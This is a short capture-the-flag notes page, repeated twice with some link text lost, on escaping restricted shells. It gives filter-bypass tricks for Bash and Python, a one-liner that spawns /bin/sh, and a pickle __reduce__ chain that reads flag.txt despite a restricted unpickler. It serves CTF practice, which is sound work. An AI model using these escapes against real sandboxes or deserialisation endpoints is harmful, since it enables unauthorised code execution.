Escape

Last updated 3 years ago

Escape

Homebrew shells

()

If the challenge is a homemade shell with some artificial limitations, gtfobins and LOLBAS list myriad ways to escape. These aren't vulnerabilities, per se, but intended functionality of applications that are commonly installed.

Bash

Forbidden strings

${NOSUCHVAR:-fla}${NOSUCHVAR:-g.txt}    # expands to flag.txt

Stars aren't the only wildcard

fla?.txt
fl{a,A}g.txt
fl[a-z]g.txt

Docker

, a vulnerability scanner.
, a vulnerability scanner.
, scans windows containers.

Electron

git

Javascript

Python

Python has so many ways to introspect, reflect, reload, import, execute unintended code.

Here's a pretty simple one:

import statistics
statistics.random._os._execvpe("/bin/sh", [], {})

Forbidden strings

If there's some sort of word blocklist, try unicode:

>>> 𝖕𝖗𝖎𝖓𝖙(1)
1

Python runs it just fine.

Pickle

#!/usr/bin/env python3

# From the error message we can see that only __main__, __buitin__ and copyreg are allowed
# __builtin__.eval and __builtin__.exec are banned as well
# We can just open and print the flag.txt by using __builin__.open, followed by readline and print
# This sequence of calls is constructed below by using multiple objects and the pickle __reduce__ interface

import base64
import builtins
import pickle

class FlagObjPickle:
    def __reduce__(self):
        return builtins.open, ("./flag.txt",)
    def readlines(self):
        pass

class ReadFlagPickle:
    def __reduce__(self):
        return FlagObjPickle().readlines, tuple()

class PrintFlagPickle:
    def __reduce__(self):
        return builtins.print, (ReadFlagPickle(),)

a = PrintFlagPickle()
pickled = pickle.dumps(a, 0)

Any callable in the target's namespace can be called with (almost) arbitrary parameters by pickling a class which implements __reduce__. Return the callable and a tuple of arguments. See above for a technique to chain as well.

PreviousPHP NextEscalation

Last updated 3 years ago

Homebrew shells

()

Bash

Forbidden strings

${NOSUCHVAR:-fla}${NOSUCHVAR:-g.txt}    # expands to flag.txt

Stars aren't the only wildcard

fla?.txt
fl{a,A}g.txt
fl[a-z]g.txt

Docker

, a vulnerability scanner.
, a vulnerability scanner.
, scans windows containers.

Electron

isn't necessarily blocked like file:// is.

Perhaps the app even uses its own ?

git

tries to be restrictive server-side, but might not be.

Javascript

Python

Python has so many ways to introspect, reflect, reload, import, execute unintended code.

Here's a pretty simple one:

import statistics
statistics.random._os._execvpe("/bin/sh", [], {})

Forbidden strings

If there's some sort of word blocklist, try unicode:

>>> 𝖕𝖗𝖎𝖓𝖙(1)
1

Python runs it just fine.

Pickle

#!/usr/bin/env python3

# From the error message we can see that only __main__, __buitin__ and copyreg are allowed
# __builtin__.eval and __builtin__.exec are banned as well
# We can just open and print the flag.txt by using __builin__.open, followed by readline and print
# This sequence of calls is constructed below by using multiple objects and the pickle __reduce__ interface

import base64
import builtins
import pickle

class FlagObjPickle:
    def __reduce__(self):
        return builtins.open, ("./flag.txt",)
    def readlines(self):
        pass

class ReadFlagPickle:
    def __reduce__(self):
        return FlagObjPickle().readlines, tuple()

class PrintFlagPickle:
    def __reduce__(self):
        return builtins.print, (ReadFlagPickle(),)

a = PrintFlagPickle()
pickled = pickle.dumps(a, 0)